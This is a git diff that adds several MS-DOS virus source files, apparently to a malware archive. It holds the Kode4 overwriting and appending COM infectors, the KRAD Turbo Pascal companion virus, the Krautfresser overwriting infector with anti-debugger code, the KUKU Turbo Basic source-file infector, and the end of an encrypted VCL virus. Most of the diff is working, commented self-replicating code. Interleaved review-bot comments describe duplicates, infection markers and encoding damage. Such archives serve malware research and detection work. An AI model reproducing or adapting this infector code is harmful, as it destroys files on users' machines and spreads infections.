+get_day endp
+
+get_weekday proc near
+ mov ah,02Ah ; DOS get date function
+ int 021h
+ cbw ; Sign-extend AL into AX
+ ret ; Return to caller
+get_weekday endp
+
+data00 db "DIE BITCH!!!!! AHHHHHHHH!!!!!!!",13,10,0
+
+vcl_marker db "[VCL]",0 ; VCL creation marker
+
+
+note db "Dedicated to the memory of"
+ db " Sam Kinnison 1954-1992",0
+ db "[Kinnison]",0
+ db "Nowhere Man, [NuKE] '92",0
+encrypt_code proc near
+ push bx ; Save BX
+
+ push di ; Save DI
+ lea si,[di + encrypt_decrypt - start] ; SI points to encryption code
+
+ xor ah,ah ; BIOS get time function
+ int 01Ah
+ or dx,1 ; Insure we never get zero
+ mov word ptr [si + 5],dx ; Low word of timer is new key
+
+alter_flag: mov al,0 ; AL holds alteration flag
+ inc byte ptr [di + (alter_flag + 1) - start] ; Toggle alteration flag
+
+ test al,1 ; Is bit one set?
+ jne check_nop ; If not then don't toggle
+
+ xor byte ptr [si],0110b ; Change all BPs in startup code
+ xor byte ptr [si + 4],010b ; to BXs, and vice-versa
+ xor byte ptr [si + 7],0110b ;
+
+check_nop: test al,2 ; Is bit two set?
+ jne do_encryption ; If not then don't toggle
+
+ mov ax,word ptr [si + 7] ; AX holds INC/NOP
+ xchg ah,al ; Exchange position of INC and NOP
+ mov word ptr [si + 7],ax ; Put the word back
+
+do_encryption: mov si,di ; SI points to start of code
+ lea di,[di + finish - start] ; DI points past code
+ mov cx,(finish - start) / 2 ; CX holds words to transfer
+ rep movsw ; Copy the code past the end
+
+ pop di ; Restore DI
+ lea si,[di + (finish + (start_of_code - start)) - start] ; SI points to code to encrypt
+ call encrypt_decrypt ; Encrypt the code
+
+ pop bx ; Restore BX
+ ret ; Return to caller
+encrypt_code endp
+
+even ; Must be on an even boundry
+
+end_of_code label near
+
+encrypt_decrypt proc near
+ mov bp,end_of_code - start_of_code - 2 ; BP holds length of code
+xor_loop: db 081h,032h,00h,00h ; XOR a word with the key
+ dec bp ; Do the next byte
+ nop ; Used to throw off detectors
+ jne xor_loop ; Repeat until we're done
+ ret ; Return to caller
+encrypt_decrypt endp
+finish label near
+
+code ends
+ end main
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm b/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm
new file mode 100644
index 00000000..38ea9e91
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kode4-1.asm
@@ -0,0 +1,94 @@
+;######################################################################
+;# Name: Kode4 version 1.0 (overwritting stage)
+;# Author: Soltan Griss [YAM]
+;#
+;# Description: What this sucker does is very simple. it overwrites
+;# the first 46 bytes of all com files in the current
+;# directory, with it's own code... as of scanv93, this
+;# virus is undetectable..
+;#
+;#
+;# Special Thanks go out to Data Disruptor.. If it were not for you i
+;# would still be fucking lost!!!!
+;#
+;######################################################################
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+V_Length equ last-start
+KODE4 proc far
+
+start label near ;Check for Virex installiation
+
+ mov ax,0ff0fh
+ int 21h
+ cmp ax,0101h ;Abort if Virex Protection
+ je done ; present
+
+
+ mov ah,4Eh ;Find first Com file
+ mov dx,offset filename ;use "*.com"
+ int 21h
+
+Back:
+ mov ah,43h ;get rid of read only
+ mov al,0
+ mov dx,9eh
+ int 21h
+ mov ah,43h
+ mov al,01
+ and cx,11111110b
+ int 21h
+
+ mov ax,3D01h ;Open file for writing
+ mov dx,9Eh ;get file name from file DTA
+ int 21h
+
+ mov bx,ax ;save handle in bx
+ mov ah,57h ;get time date
+ mov al,0
+ int 21h
+
+ push cx ;put in stack for later
+ push dx
+
+
+ mov dx,100h ;Start writing at 100h
+ mov cl,v_length ;write 46 bytes
+ mov ah,40h ;Write Data into the file
+ int 21h
+
+
+ pop dx ;Restore old dates and times
+ pop cx
+ mov ah,57h
+ mov al,01h
+ int 21h
+
+
+
+ mov ah,3Eh ;Close the file
+ int 21h
+
+ mov ah,4Fh ;Find Next file
+ int 21h
+
+ jnc Back
+ mov ah,9h
+ mov dx,offset DATA
+ int 21h
+
+done: int 20h ;Terminate Program
+filename db "*.c*",0
+DATA db " -=+ Kode4 +=-, The one and ONLY!$"
+
+
+kode4 endp
+LAST label near
+seg_a ends
+ end start
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4-2.asm b/MSDOS/Virus.MSDOS.Unknown.kode4-2.asm
new file mode 100644
index 00000000..ff4a9ef2
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kode4-2.asm
@@ -0,0 +1,185 @@
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+V_Length equ vend-vstart
+KODE4 proc far
+start label near
+ db 0E9h,00h,00h
+
+
+vstart equ $
+
+ mov si,100h ;get si to point to 100
+ mov di,102h ;get di to point to 102
+lback: inc di ;increment di
+ mov ax,word ptr [si] ;si is ponting to ax
+ cmp word ptr [di],ax ;compare ax with di loc
+ jne lback ;INE go back and inc di
+
+
+ mov ax,word ptr [si+1]
+ cmp ax,word ptr [di+1]
+ je lout
+ jmp lback
+
+lout: add di,3h ;jmp stored in the end
+ sub di,(v_length+100h) ;+3 to get to end and -
+ mov si,di ;
+;**********************************************************************
+;*
+;* The above code can be re-written as follows...
+;* The above idea, although it works is very long in code....
+;* when DOS does a load and execute it pushes all registers the last
+;* register to be pushed contains the file length. so just subtract
+;* the current location
+;**********************************************************************
+;
+;
+;
+;Host_Off: pop bp
+; sub bp,offset host_off
+; mov si,bp
+;
+;*** Before opening any file copy the original three bytes back to 100h
+;*** Because they will get overwritten when you check any new files
+ lea di,temp_buff
+ add di,si
+ mov ax,word ptr [di]
+ mov cl,byte ptr [di+2]
+ mov di,100h
+ mov word ptr [di],ax
+ mov byte ptr [di+2],cl
+
+
+ mov ah,4Eh ;Find first Com file
+ mov dx,offset filename ; offset of "*.com"
+ add dx,si
+ int 21h
+ jnc back
+ jmp done
+Back:
+ mov ah,43h ;get rid of read only
+ mov al,0
+ mov dx,9eh
+ int 21h
+ mov ah,43h
+ mov al,01
+ and cx,11111110b
+ int 21h
+
+ mov ax,3D02h ;Open file for read/writing
+ mov dx,9Eh ;get file name from file DTA
+ int 21h
+ jnc next
+ jmp done
+next: mov bx,ax ;save handle in bx
+ mov ah,57h ;get time date
+ mov al,0
+ int 21h
+
+ push cx ;put in stack for later
+ push dx
+
+ mov ax,4200h ; Move ptr to start of file
+ xor cx,cx
+ xor dx,dx
+ int 21h
+
+
+ mov ah,3fh ;load first 3 bytes
+ mov cx,3
+
+ mov dx,offset temp_buff
+ add dx,si
+ int 21h
+
+ xor cx,cx ;move file pointer to end of file
+ xor dx,dx
+ mov ax,4202h
+ int 21h
+ sub ax,3 ; Fix for real location
+ push ax
+ ; nop ;
+ ; nop ; used for debugging
+ ; nop ;
+ ; nop ;
+ ; nop
+
+ mov di,offset temp_buff
+ add di,si
+ mov word ptr [j_code2+si],ax; Save two bytes in a
+ ; word [jumpin]
+
+ cmp byte ptr [di],0e9h ;look for a jmp at begining
+ jne infect
+
+ mov cx,word ptr [di+1] ;check for XXX bytes at end
+ pop ax
+ sub ax,v_length
+ cmp ax, cx ; jump (id string to check)
+ jne infect
+ jmp finish
+
+
+
+infect:
+
+ xor cx,cx ;move file pointer to begining
+ xor dx,dx ;to write jump
+ mov ax,4200h
+ int 21h
+
+ mov ah,40h ;write jump in first 3 bytes
+ mov cx,3
+ mov dx, offset j_code1
+ add dx,si
+ int 21h
+
+ xor cx,cx ;move file pointer to end of file
+ xor dx,dx
+ mov ax, 4202h
+ int 21h
+
+ mov dx,offset vstart
+ add dx,si ;Start writing at top of virus
+ mov cx,(vend-vstart) ; Set for length of virus
+ mov ah,40h ;Write Data into the file
+ int 21h
+
+
+Finish: pop dx ;Restore old dates and times
+ pop cx
+ mov ah,57h
+ mov al,01h
+ int 21h
+
+ mov ah,3Eh ;Close the file
+ int 21h
+
+ mov ah,4Fh ;Find Next file
+ int 21h
+ jc done
+ jmp back
+
+done:
+ mov bp,100h
+ jmp bp
+
+
+filename db "*.com",0
+DATA db " -=+ Kode4 +=-, The one and ONLY!$"
+
+j_code1 db 0e9h
+j_code2 db 00h,00h
+temp_buff db 0cdh,020h,090h ; CD 20 NOP
+kode4 endp
+
+vend equ $
+
+seg_a ends
+
+ end start
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4.asm b/MSDOS/Virus.MSDOS.Unknown.kode4.asm
new file mode 100644
index 00000000..77e242c6
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kode4.asm
@@ -0,0 +1,100 @@
+ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
+
+Article Title: Kode 4 v1 Virus
+Author: Soltan Griss
+
+
+;######################################################################
+;# Name: Kode4 version 1.0 (overwritting stage)
+;# Author: Soltan Griss [YAM]
+;#
+;# Description: What this sucker does is very simple. it overwrites
+;# the first 46 bytes of all com files in the current
+;# directory, with it's own code... as of scanv93, this
+;# virus is undetectable..
+;#
+;#
+;# Special Thanks go out to Data Disruptor.. If it were not for you i
+;# would still be fucking lost!!!!
+;#
+;######################################################################
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+V_Length equ last-start
+KODE4 proc far
+
+start label near ;Check for Virex installiation
+
+ mov ax,0ff0fh
+ int 21h
+ cmp ax,0101h ;Abort if Virex Protection
+ je done ; present
+
+
+ mov ah,4Eh ;Find first Com file
+ mov dx,offset filename ;use "*.com"
+ int 21h
+
+Back:
+ mov ah,43h ;get rid of read only
+ mov al,0
+ mov dx,9eh
+ int 21h
+ mov ah,43h
+ mov al,01
+ and cx,11111110b
+ int 21h
+
+ mov ax,3D01h ;Open file for writing
+ mov dx,9Eh ;get file name from file DTA
+ int 21h
+
+ mov bx,ax ;save handle in bx
+ mov ah,57h ;get time date
+ mov al,0
+ int 21h
+
+ push cx ;put in stack for later
+ push dx
+
+
+ mov dx,100h ;Start writing at 100h
+ mov cl,v_length ;write 46 bytes
+ mov ah,40h ;Write Data into the file
+ int 21h
+
+
+ pop dx ;Restore old dates and times
+ pop cx
+ mov ah,57h
+ mov al,01h
+ int 21h
+
+
+
+ mov ah,3Eh ;Close the file
+ int 21h
+
+ mov ah,4Fh ;Find Next file
+ int 21h
+
+ jnc Back
+ mov ah,9h
+ mov dx,offset DATA
+ int 21h
+
+done: int 20h ;Terminate Program
+filename db "*.c*",0
+DATA db " -=+ Kode4 +=-, The one and ONLY!$"
+
+
+kode4 endp
+LAST label near
+seg_a ends
+ end start
+
+
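Review bot: The first six lines of this file (`ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92`, `Article Title: Kode 4 v1 Virus`, `Author: Soltan Griss`) are e-zine article text sitting outside any `;` comment, and the body that follows appears to be the same text as Virus.MSDOS.Unknown.kode4-1.asm in this commit, so the file is an article transcript duplicating an existing sample rather than a distinct source. The same pattern holds for Virus.MSDOS.Unknown.kode4v2.asm against Virus.MSDOS.Unknown.kode4-2.asm, and Virus.MSDOS.Unknown.krad.pas carries scraped web-page residue after its final `End.` (`This page hosted by Get your own Free Homepage`). For corpus consumers it would help to record the provenance, for example a leading `; Transcribed from Evolution #2 (YAM '92); body identical to kode4-1.asm` in this file and its kode4v2 sibling, so duplicates and non-source lines can be recognised without diffing the archive.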
diff --git a/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm b/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm
new file mode 100644
index 00000000..2e211e3d
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kode4v2.asm
@@ -0,0 +1,191 @@
+ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92
+
+Article Title: Kode 4 v2 Virus
+Author: Soltan Griss
+
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+V_Length equ vend-vstart
+KODE4 proc far
+start label near
+ db 0E9h,00h,00h
+
+
+vstart equ $
+
+ mov si,100h ;get si to point to 100
+ mov di,102h ;get di to point to 102
+lback: inc di ;increment di
+ mov ax,word ptr [si] ;si is ponting to ax
+ cmp word ptr [di],ax ;compare ax with di loc
+ jne lback ;INE go back and inc di
+
+
+ mov ax,word ptr [si+1]
+ cmp ax,word ptr [di+1]
+ je lout
+ jmp lback
+
+lout: add di,3h ;jmp stored in the end
+ sub di,(v_length+100h) ;+3 to get to end and -
+ mov si,di ;
+;**********************************************************************
+;*
+;* The above code can be re-written as follows...
+;* The above idea, although it works is very long in code....
+;* when DOS does a load and execute it pushes all registers the last
+;* register to be pushed contains the file length. so just subtract
+;* the current location
+;**********************************************************************
+;
+;
+;
+;Host_Off: pop bp
+; sub bp,offset host_off
+; mov si,bp
+;
+;*** Before opening any file copy the original three bytes back to 100h
+;*** Because they will get overwritten when you check any new files
+ lea di,temp_buff
+ add di,si
+ mov ax,word ptr [di]
+ mov cl,byte ptr [di+2]
+ mov di,100h
+ mov word ptr [di],ax
+ mov byte ptr [di+2],cl
+
+
+ mov ah,4Eh ;Find first Com file
+ mov dx,offset filename ; offset of "*.com"
+ add dx,si
+ int 21h
+ jnc back
+ jmp done
+Back:
+ mov ah,43h ;get rid of read only
+ mov al,0
+ mov dx,9eh
+ int 21h
+ mov ah,43h
+ mov al,01
+ and cx,11111110b
+ int 21h
+
+ mov ax,3D02h ;Open file for read/writing
+ mov dx,9Eh ;get file name from file DTA
+ int 21h
+ jnc next
+ jmp done
+next: mov bx,ax ;save handle in bx
+ mov ah,57h ;get time date
+ mov al,0
+ int 21h
+
+ push cx ;put in stack for later
+ push dx
+
+ mov ax,4200h ; Move ptr to start of file
+ xor cx,cx
+ xor dx,dx
+ int 21h
+
+
+ mov ah,3fh ;load first 3 bytes
+ mov cx,3
+
+ mov dx,offset temp_buff
+ add dx,si
+ int 21h
+
+ xor cx,cx ;move file pointer to end of file
+ xor dx,dx
+ mov ax,4202h
+ int 21h
+ sub ax,3 ; Fix for real location
+ push ax
+ ; nop ;
+ ; nop ; used for debugging
+ ; nop ;
+ ; nop ;
+ ; nop
+
+ mov di,offset temp_buff
+ add di,si
+ mov word ptr [j_code2+si],ax; Save two bytes in a
+ ; word [jumpin]
+
+ cmp byte ptr [di],0e9h ;look for a jmp at begining
+ jne infect
+
+ mov cx,word ptr [di+1] ;check for XXX bytes at end
+ pop ax
+ sub ax,v_length
+ cmp ax, cx ; jump (id string to check)
+ jne infect
+ jmp finish
+
+
+
+infect:
+
+ xor cx,cx ;move file pointer to begining
+ xor dx,dx ;to write jump
+ mov ax,4200h
+ int 21h
+
+ mov ah,40h ;write jump in first 3 bytes
+ mov cx,3
+ mov dx, offset j_code1
+ add dx,si
+ int 21h
+
+ xor cx,cx ;move file pointer to end of file
+ xor dx,dx
+ mov ax, 4202h
+ int 21h
+
+ mov dx,offset vstart
+ add dx,si ;Start writing at top of virus
+ mov cx,(vend-vstart) ; Set for length of virus
+ mov ah,40h ;Write Data into the file
+ int 21h
+
+
+Finish: pop dx ;Restore old dates and times
+ pop cx
+ mov ah,57h
+ mov al,01h
+ int 21h
+
+ mov ah,3Eh ;Close the file
+ int 21h
+
+ mov ah,4Fh ;Find Next file
+ int 21h
+ jc done
+ jmp back
+
+done:
+ mov bp,100h
+ jmp bp
+
+
+filename db "*.com",0
+DATA db " -=+ Kode4 +=-, The one and ONLY!$"
+
+j_code1 db 0e9h
+j_code2 db 00h,00h
+temp_buff db 0cdh,020h,090h ; CD 20 NOP
+kode4 endp
+
+vend equ $
+
+seg_a ends
+
+ end start
+
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.krad.pas b/MSDOS/Virus.MSDOS.Unknown.krad.pas
new file mode 100644
index 00000000..8bab4190
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.krad.pas
@@ -0,0 +1,137 @@
+Program KRAD;
+
+{ ____ _____ _______ ______
+ /___/\/____/\ /______/\ /_____/\___ __/\_____
+ \ \| \ \___| \ | \___/ /_ ___/ BOOM! <======
+ \ \/___| + \| + |/ /_/\/
+ \______|\___________|\___________/
+
+
+ Virus Laboratories and Distribution
+ Proudly present the KRAD Virus
+ Written by Metabolis for non assembler ppls
+
+
+ Why call it the KRAD virus? Cos it is! A companion virus
+ written in Turbo Pascal, well that just sums it up. I wrote
+ this for two reasons.. 1) Not everyone knows assembler 2)
+ a friend reckoned a virus couldn't be programmed in Turbo
+ Pascal.. (by that he meant *I* couldn't do it). No matter
+ how lame.. it's still a virus! (Right up there with Aids/
+ Number 1 :)) Fully commented for non understanding Pascal
+ people, (a very small part of the world).
+
+ Compress this with DIET/PkLite/LZEXE or something similar
+ when it's compiled. Then rename it to a .COM file and hey
+ presto, you can run it! I guess an added bonus of this
+ virus is, if there's another companion virus on your system
+ it won't overwrite it, it will take that as an infection
+ and leave it alone.
+
+ KRAD virus will immediately infect C:\DOS or C:\MSDOS if
+ they exist, so if any DOS .EXE files are run it will infect
+ all the files in the current dir that you ran the DOS
+ command from. }
+
+Uses Dos,Crt; {Even if I don't use one of 'em..
+ it's best to include both. }
+
+{$M 59999,0,8000} {This program needs memory for two things..
+ 1) To use as a buffer when copying the virus
+ 2) To execute the program originally run. }
+
+Var Inf,Inf2:Searchrec; {Used in the EXE and file_exist routines }
+ Infected:Boolean; {Is a file infected? }
+ Params:Byte; {Loop Index for adding all parameters together }
+ All_Params:String; {This string contains the whole list of parameters
+ originally passed to the program }
+ P:PathStr; { Used by the FSplit procedure. }
+ D:DirStr; { "" }
+ N:NameStr; { "" }
+ E:ExtStr; { "" }
+
+Procedure Check_Infected(Path:String);
+{Is the .EXE file we've found infected? }
+Begin
+ FSplit(Inf.Name,D,N,E); {Split it up into directory, name
+ and extension. }
+ FindFirst(Path+N+'.COM',Anyfile,Inf2); {Look for the .COM file with the
+ same file name, if this exists
+ then the file is already infected. }
+ Infected:=(DosError=0); {Set the Infected flag }
+End;
+
+Procedure CopyFile(SourceFile, TargetFile:string);
+{Straight Forward copying routine, I won't comment all of this.. }
+var
+ Source,
+ Target : file;
+ BRead,
+ Bwrite : word;
+ FileBuf : array[1..2048] of char;
+Begin
+ Assign(Source,SourceFile);
+ SetFattr(Source,$20); {Set the file attributes of the
+ hidden COM companion we're going
+ to be copying to archive so that
+ it's possible read it. }
+ {$I-}
+ Reset(Source,1);
+ {$I+}
+ If IOResult < 0 then
+ Begin
+ Exit; {Couldn't open the source file! }
+ End;
+ Assign(Target,TargetFile);
+ {$I-}
+ Rewrite(Target,1);
+ {$I+}
+ If IOResult < 0 then
+ Begin
+ Exit; {Couldn't open the target file! }
+ End;
+ Repeat
+ BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);
+ BlockWrite(Target,FileBuf,Bread,Bwrite);
+ Until (Bread = 0) or (Bread < BWrite);
+ Close(Source);
+ Close(Target);
+ SetFattr(Source,3); {Set the COM companion that we
+ copied back to hidden and
+ read-only. }
+ SetFattr(Target,3);
+End;
+
+Procedure FaI(Path:String);
+{Find and Infect!}
+Begin
+ FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! }
+ While DosError=0 Do Begin
+ Infected:=False;
+ Check_Infected(Path); { Check if the .EXE found is already infected. }
+ If Not Infected then Begin
+ CopyFile(ParamStr(0),Path+N+'.COM');
+ End;
+ { If the file isn't infected then copy the .COM version of the
+ file you're executing to companionship with the .EXE you have
+ found that isn't infected. }
+ FindNext(Inf);
+ End;
+End;
+
+Begin
+ FaI('C:\DOS\'); { Find & Infect! Go for the DOS dirs first }
+ FaI('C:\MSDOS\'); { because this is where most EXE files will }
+ FaI(''); { be executed from! }
+ FSplit(ParamStr(0),D,N,E); { Make sure we have the path and name of the
+ file we actually want to execute. }
+ All_Params:=''; { "Remember to initialise those variables!" - Teacher }
+ For Params:=1 To ParamCount
+ do All_Params:=All_Params+ParamStr(Params)+' ';
+ Exec(D+N+'.EXE',All_Params); {Execute the file that the user
+ wanted to in the first place
+ keeping all original parameters. }
+End.
+{Easy wasn't it? I thought so.. }
+
+This page hosted by Get your own Free Homepage
diff --git a/MSDOS/Virus.MSDOS.Unknown.krautfresser.asm b/MSDOS/Virus.MSDOS.Unknown.krautfresser.asm
new file mode 100644
index 00000000..50c3c59b
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.krautfresser.asm
@@ -0,0 +1,110 @@
+.model tiny
+.code
+org 100h
+
+
+start_virus:
+and al,21h
+
+mov cx,100h ;for tha tbav
+abc: ;
+loop abc ;
+
+ ;anti_disassembler
+mov cx,09ebh
+mov ax,0fe05h
+jmp $-2
+add ah,03bh
+jmp $-10
+
+ ;anti_debugger
+mov ax,3503h ;save int 3h in bx
+int 21h ;do it
+mov ah,25h ;set new int 3h...
+mov dx,offset new_int_3 ;...to new_int_3
+int 21h ;do it
+xchg bx,dx ;exchange bx,dx (restore original int 3h)
+int 21h ;do it
+
+
+ ;anti_vsafe
+mov ax,0f9f2h
+add ax,10h
+mov dx,5935h
+add dx,10h
+mov bl,10h
+sub bl,10h
+int 16h
+
+
+
+mov ah,5eh ;find first
+sub ah,10h
+
+mov cx,5h ;5 files to infect
+push cx
+
+jmp jojo ;go ta jojo
+find_next:
+push cx
+mov ah,5fh ;find next
+sub ah,10h
+jojo:
+xor cx,cx ;attribut normal
+mov dx,offset star_dot_com ;*.COM
+int 21h ;do it
+jb ende_virus ;no more filz -> ende_virus
+
+mov ax,3d02h ;open file
+mov dx,9eh ;file name
+int 21h ;do it
+
+mov bx,ax ;move file handler in bx
+
+mov ax,5700h ;get file time
+int 21h ;do it
+
+cmp cx,0000h ;if file time = 0 then infect it
+je prepare_for_new ;else goto prepare_for_new file search
+
+mov ah,50h ;write file (infect it)
+sub ah,10h
+mov cx,offset fin - offset start_virus ;virus size
+mov dx,offset start_virus ;begin at start
+int 21h ;do it
+
+mov ax,5701h ;set infected file time
+mov cx,0000h ;to 0000
+int 21h ;do it
+
+mov ah,3eh ;close file
+int 21h ;do it
+
+pop cx
+push cx
+loop find_next ;look for tha next file to infect
+
+ende_virus:
+int 20h ;-> exit
+
+prepare_for_new: ;prepare for the next file search
+mov ah,3eh ;close file
+int 21h ;do it
+pop cx
+jmp find_next ;goto find_next file
+
+
+new_int_3: ;new interrupt 3h
+mov ah,9h ;write string to standard output
+mov dx,offset autor ;[easyman written by spooky]
+int 21h ;do it
+mov ah,00h ;wait until keypressed
+int 16h ;do it
+int 20h ;-> terminate debugging
+
+
+autor: db '[Krautfresser written by Spooky]',0dh,0ah ;copyright
+ db ' 1996 Austria',0dh,0ah,'$'
+star_dot_com: db '*.com',0 ;filespec
+fin:
+end start_virus
diff --git a/MSDOS/Virus.MSDOS.Unknown.kuku.bas b/MSDOS/Virus.MSDOS.Unknown.kuku.bas
new file mode 100644
index 00000000..46c0714e
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.kuku.bas
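Review bot: The file has no archive header stating what the sample does, and the infection path is easy to misread without one: the write at `mov ah,50h` / `sub ah,10h` (AH=40h) goes to a handle opened with 3D02h that is never repositioned, so the body is written at offset 0 and the first `fin - start_virus` bytes of each host are overwritten rather than appended — such files cannot be disinfected, only restored from backup. The infection marker is a DOS file time of 0000h (`cmp cx,0000h`, then `mov ax,5701h` with CX=0), which is also the cheapest indicator for a scanner or a post-incident sweep of *.com files. I would add a header comment along the lines of `; archived sample: direct-overwriting *.com infector (writes at offset 0, hosts not recoverable); marker = DOS file time 0000h`.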
@@ -0,0 +1,102 @@
+$event off
+defint a-z
+screen 0,0,0
+?"KUKU VIRUS Ver. 1.0 (Distribution module.)"
+?"Copyright (C) Û IVC Û Moscow groupe.":?
+color 15,4:
+?"***************************************"
+?"* D A N G E R !!! *"
+?"* Virus for Turbo Basic source files. *"
+?"***************************************":beep
+color 7,0
+?:?"Press any key to process ...";
+while inkey$="":wend
+?" process";
+CALL kuku
+if z=0 then ?"File infected."
+if z=11 then ?" imposible (NO FILE FOR INFECTED)."
+?:?"About all question call to MOSCOW GROUPE of International
+?tab(45);"Viruses"
+?tab(45);"Company (IVC, Inc.)
+while inkey$="":wend
+screen 0,1,0
+sub KUKU
+ shared z
+ n$=string$(8,63)+chr$(46)+chr$(66)+chr$(65)+chr$(83):dim dta%(32),find%(32)
+ for a%=0% to 32%:dta%(a%)=0:next
+ for z=0 to len(n$)-2 step 2:find%(z/2)=asc(mid$(n$,z+2,1))*256+asc(mid$(n$,z+1,1)):next
+ reg 1,&h1A00:reg 8,varseg(dta%(0)):reg 4,varptr(dta%(0)):call interrupt &h21
+ reg 1,&h4e00:reg 3,attr:reg 8,varseg(find%(0)):reg 4,varptr(find%(0)):call interrupt &h21
+ if reg(1)<>0 then p$=string$(15,255):goto findfirst1
+ for a=0 to 32:h=dta%(a) and 255:p$=p$+chr$(h):l=(dta%(a)-h)/&h100 and 255:p$=p$+chr$(l):next
+ findfirst1:
+ dta$=p$:f$=mid$(dta$,&h1f,13):if f$=string$(len(f$),255) then z=11:exit sub
+ a=instr(2,f$,chr$(0)):file$=mid$(f$,1,a)
+ ?:?"Infecting file :"file$
+ name file$ as chr$(128)
+ s1$=chr$(67)+chr$(65)+chr$(76)+chr$(76)+CHR$(32)
+ s2$=chr$(68)+chr$(65)+chr$(84)+chr$(65)
+ s$=chr$(75)+chr$(85)+chr$(75)+chr$(85)
+ open chr$(128) for input as#1
+ ?"Size:"lof(1)
+ open file$ for output as #2
+ ? #2,S1$S$chr$(13)chr$(10)
+ ?"Transfer file ..."
+ while not eof(1):line input #1,a$:if a$="CALL KUKU" then z=10
+ ? #2,a$:wend
+ if z=10 then ccq
+ ?#2,chr$(32)
+ ?"Move data ..."
+ for a=1 to 2
+ restore KukuData
+ if a=2 then ?#2,S$+s2$+chr$(58)
+ while QWE$<>chr$(39)
+ read qwe$
+ if a=2 then ?#2,S2$+chr$(34);
+ ? #2,qwe$
+ wend
+ qwe$=chr$(32)
+ next
+ ?#2,chr$(69)+chr$(78)+chr$(68)+chr$(32)+chr$(83)+chr$(85)+chr$(66)
+ ?"Out size:";lof(2)
+ close #1,#2:kill chr$(128):
+ end
+ccq:
+ ?:?"File already infected ...":z=10
+ close:kill chr$(128)
+ exit sub
+kukudata:
+
+data"sub KUKU"
+data"' KUKU VIRUS FOR TURBO-BASIC !!!"
+data"' This virus make at UPK-2 of Sevastopolsky r-n, Moscow.
+data"n$=string$(8,63)+chr$(46)+chr$(66)+chr$(65)+chr$(83):dim dta%(32),find%(32)
+data"for a%=0% to 32%:dta%(a%)=0:next
+data"for z=0 to len(n$)-2 step 2:find%(z/2)=asc(mid$(n$,z+2,1))*256+asc(mid$(n$,z+1,1)):next
+data"reg 1,&h1A00:reg 8,varseg(dta%(0)):reg 4,varptr(dta%(0)):call interrupt &h21
+data"reg 1,&h4e00:reg 3,attr:reg 8,varseg(find%(0)):reg 4,varptr(find%(0)):call interrupt &h21
+data"if reg(1)<>0 then p$=string$(15,255):goto findfirstfile1
+data"for a=0 to 32:h=dta%(a) and 255:p$=p$+chr$(h):l=(dta%(a)-h)/&h100 and 255:p$=p$+chr$(l):next
+data"findfirstfile1:
+data"dta$=p$:f$=mid$(dta$,&h1f,13):if f$=string$(len(f$),255) then
+data"for J=1 to 1500:Sound Rnd(1)*(1500-j)+40,.01:NEXT:delay(2)
+data"screen 1:def seg=&Hb800:for a=0 to 16384:poke a,rnd(1)*255:next:exit sub
+data"end if
+data"a=instr(2,f$,chr$(0)):file$=mid$(f$,1,a):name file$ as chr$(128)
+data"s1$=chr$(67)+chr$(65)+chr$(76)+chr$(76)+CHR$(32):s2$=chr$(68)+chr$(65)+chr$(84)+chr$(65):s$=chr$(75)+chr$(85)+chr$(75)+chr$(85)
+data"open chr$(128) for input as#1
+data"open file$ for output as #2
+data"? #2,S1$S$chr$(13)chr$(10)
+data"while not eof(1):line input #1,a$:? #2,a$:wend
+data"?#2,chr$(32)
+data"for a=1 to 2:restore KukuData
+data"if a=2 then ?#2,S$+s2$
+data"while QWE$<>chr$(39):read qwe$:if a=2 then ?#2,S2$chr$(34);
+data"? #2,qwe$+chr$(34):wend
+data"qwe$=chr$(32):next
+data"?#2,chr$(69)chr$(78)chr$(68)chr$(32)chr$(83)chr$(85)chr$(66)
+data"close #1,#2:kill chr$(128):exit sub
+data"' KUKU Virus Version 1.0
+data"' (C) ÛIVCÛ Moscow groupe. 25-May-1991. Serial No.0003529
+DATA"'"
+end sub
\ No newline at end of file
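Review bot: The banner and the DATA block contain mis-transcoded characters (`Û IVC Û` in the copyright line, `ÛIVCÛ` in the data block) that look like CP437/CP866 box-drawing bytes decoded as a Western code page; since the DATA strings are exactly what `read qwe$` / `? #2,qwe$` copies into target files, a transcoding silently changes the archived payload text, so the file should either keep the original bytes or record the source code page in a header comment. The file also ends without a trailing newline. For anyone triaging this directory, a one-line header would help too — the sample is a Turbo Basic source-file infector rather than an MSDOS binary, and its already-infected marker is the literal line `CALL KUKU` (the `if a$="CALL KUKU" then z=10` check) — e.g. `' archived sample: Turbo Basic source infector; marker line "CALL KUKU"`.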
diff --git a/MSDOS/Virus.MSDOS.Unknown.lacimehc.asm b/MSDOS/Virus.MSDOS.Unknown.lacimehc.asm
new file mode 100644
index 00000000..94692892
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.lacimehc.asm
